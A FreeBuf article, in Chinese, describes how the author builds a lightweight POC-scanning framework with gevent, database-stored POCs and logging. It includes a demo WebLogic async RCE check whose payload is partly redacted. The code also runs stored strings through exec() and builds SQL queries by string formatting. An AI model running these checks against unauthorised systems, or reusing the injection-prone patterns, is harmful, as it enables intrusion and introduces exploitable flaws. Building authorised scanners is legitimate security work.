100行代码手撸一个个人版“pocsuite”
距离笔者在gayhub发布“AngelSword”这款工具已有两年时间,这期间来有不少人star和fork,同时也有很多人发私信提供建议,也是在最近半年多这个项目已经不再维护,因为时间原因不再继续添加poc,最主要原因是觉得这个项目写的并不美观且功能不够强大,所以才有了这篇文章。
0×01 另起炉灶
有了推翻了重来的想法,接着就构思这个框架到底是怎样的:
1.poc代码不存文件,用到的时候直接检测出结果。 2.只要给出关键字,自动化搜索相关的poc轮询调用。 3.web层漏洞和主机层漏洞检测分离。
按照这些思路开始怼代码,先定义数据结构:建立webexploit数据表内容如下,vulname设置为主键,poc列中存储检测代码。
demo poc代码如下:
def _verify(url, cookies, uagent, vulns, proxy): pocdict = { "vulnname":"weblogic_wls_async_rce", "isvul": False, "vulnurl":"", "payload":"", "proof":"", "response":"", "exception":"", } headers = { "User-Agent" : uagent, "Content-Type": 'text/xml', } time_stamp = time.mktime(datetime.datetime.now().timetuple()) m = hashlib.md5(str(time_stamp).encode(encoding='utf-8')) md5_str = m.hexdigest() payload = 'xxxxservers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/{0}.jsp'.format(md5_str) try: vurl = urllib.parse.urljoin(url, '_async/AsyncResponseService') req = requests.post(vurl, data=payload, cookies=cookies, headers=headers, timeout=15, verify=False, proxies=proxy) time.sleep(5) rurl = urllib.parse.urljoin(url, 'bea_wls_internal/{0}.jsp'.format(md5_str)) reqr = requests.get(rurl, timeout=10, verify=False) if r"56540676a129760a3" in reqr.text: pocdict['isvul'] = True pocdict['vulnurl'] = vurl pocdict['payload'] = payload pocdict['proof'] = rurl pocdict['response'] = reqr.text except Exception as e: pocdict['exception'] = str(e) vulns.append(pocdict) _verify(self.url, self.cookies, findProxy().randomUA(), self.vulns, self.proxynode)
poc代码存入数据库,每个poc都只有一个_verify函数,接受的参数来源于pocfactory类自身变量(后面说),程序执行完把结果存到字典最后再把字典放入列表,列表的功能当然就是为了遍历(配合协程并发)。
0×02 控制poc调度
poc调度主要有以下几种,如图所示:
1)单一poc->单一目标 2)单一poc->多个目标 3)多个poc->单一目标 4)多个poc->多个目标
为了增加速度,往往会使用threading库或者gevent库,这里首选gevent,之前测试过在高并发的情况下协程要比多线程的效率高一些。
接着编写pocfactory类,定义一些初始化变量,可以从外部动态设置参数(例如cookies或者自定义线程数),loadmodule函数的功能是把所有poc需要用到的导入模块一次性导入,这样后续每次执行poc就不需要为缺少模块而发愁了。
然后就是编写执行poc模块的函数runpocwithcmsname,这个函数接受一个keyword参数,然后从数据库中把所有匹配到keyword的poc代码全部拉出存储到poclist列表,最后再用协程并发执行pocexec函数,执行之后的结果都在self.vulns列表里,依次插入数据库。
到这里只有几十行代码就可以把搜索出来的poc一次性调度完,这样就完成了单一poc->单一目标和多个poc->单一目标。如果有不明白pocexec这个函数的作用可以参考我之前写过的一篇文章: pocsuite框架代码解析 。而要增加多目标就比较容易了,这里我测试了两种方法:多进程+协程,协程+协程,最后得出的结果是在时间开销上只用协程要比多进程+协程还要高效,然后就有了下面的代码。
为了能够清晰的显示执行poc的结果详细情况,我又用logbook模块写了一个日志类:
class mylog: def __init__(self, logname, toscreen=False): # 设置日志名称 self.logname = logname self.toscreen = toscreen # 设置日志目录 self.LOG_DIR = self.setpath() # 设置本地时间 logbook.set_datetime_format("local") # 设置终端输出格式 self.log_standard = ColorizedStderrHandler(bubble=True) self.log_standard.formatter = self.logformat # 设置文件输出格式 self.log_file = TimedRotatingFileHandler( os.path.join(self.LOG_DIR, '{}.log'.format(self.logname)), date_format='%Y-%m-%d', bubble=True, encoding='utf-8') self.log_file.formatter = self.logformat # 执行log记录 self.log = Logger("SatanLogging") self.logrun() """ 日志存储函数 """ def setpath(self): logpath = os.path.join(GlobalConf().progpath['location'], 'Backtracking/log') if not os.path.exists(logpath): os.makedirs(logpath) return logpath """ 格式化日志函数 """ def logformat(self, record, handler): log = "[{date}] [{level}] [{filename}] [{func_name}] [{lineno}] {msg}".format( # 日志时间 date=record.time, # 日志等级 level=record.level_name, # 文件名 filename=os.path.split(record.filename)[-1], # 函数名 func_name=record.func_name, # 行号 lineno=record.lineno, # 日志内容 msg=record.message ) return log """ 生成日志函数 """ def logrun(self): self.log.handlers = [] self.log.handlers.append(self.log_file) # 如果为True将日志打到屏幕 if self.toscreen: self.log.handlers.append(self.log_standard)
0×03 测试检测结果
这样基本骨架算是写完了,然后测试一下效果,目标是笔者跟朋友借的一台存在漏洞的weblogic。
在数据库中查看检测结果。
在log文件中查看检测结果,其实跟数据库中的结果大致差不多,只是response内容写进了日志而没有写进数据库。
目前针对web漏洞的poc框架的雏形已经完全写完了,核心代码只有50多行,而针对主机层的漏洞poc也采用相同的调用结构,只不过一次性导入模块可能略有区别。
还有个区别就是如果一次性发送大量请求给web服务器,每个请求都相对独立,可以说是请求的结果都相对符合预期。但是如果是主机层面的,可能一个完整的检测过程是通过好几次发包来获取结果,如果高并发的情况下会破坏socket包请求序列,这就导致有些存在漏洞的目标但是你的poc并没有检测出漏洞。所以针对主机层漏洞采用的是队列的方式,设置阻塞,当多个poc攻击一个目标的时候,让每个poc都呈现“排队”模式。
def Consumer(self, pocstr):
while not self.queue.empty():
data = self.queue.get()
sem.acquire()
exec(data)
gevent.sleep(0)
sem.release()
def runpocwithsysname(self, keyword):
try:
poclist = list()
self.loadmodule()
sql = ‘SELECT poc from hostexploit WHERE vulname like “%{}%”‘.format(keyword)
res = db().execute(sql)
for item in res:
poclist.append(item[‘poc’])
self.queue.put_nowait(item[‘poc’])
mylog(‘hostexploit’, True).log.info(pyfancy().green(‘[+]针对目标:{0}:{1} 加载{2} hostpoc {3}个’.format(self.host, self.port, keyword, len(poclist))))
threads = [gevent.spawn(self.Consumer, item) for item in poclist]
gevent.joinall(threads)
虽然用队列把多个poc对单一目标的检测给阻塞了,时间开销变大了,但是单一poc对多个目标或多个poc对多个目标发起的请求还是高并发的。
总而言之以上这些只是一个比较完整的架子,至于最基本的还是poc的累积,而自定义的poc模板也尽量是代码能少则少,只要一个函数就可以把漏洞检测出来。当然你也可以在_verify函数里写复杂的类或者函数,实践证明也是没问题的。 对于需要引入外部平台检测的,额外写个GlobalConf类,里面定义好接口地址,这些只要进入交互式终端自动加载进去就OK了。
0×04 总结&整理
虽然笔者起的名字叫100行。。。。这里的100行代码只是指核心代码,而加上数据库管理的,poc代码的和各种巴拉巴拉设置的恐怕也要超过几千行了,核心代码笔者已经上传到gayhub,可供大家参考拍砖。
*本文原创作者:六翼,本文属于FreeBuf原创奖励计划,未经许可禁止转载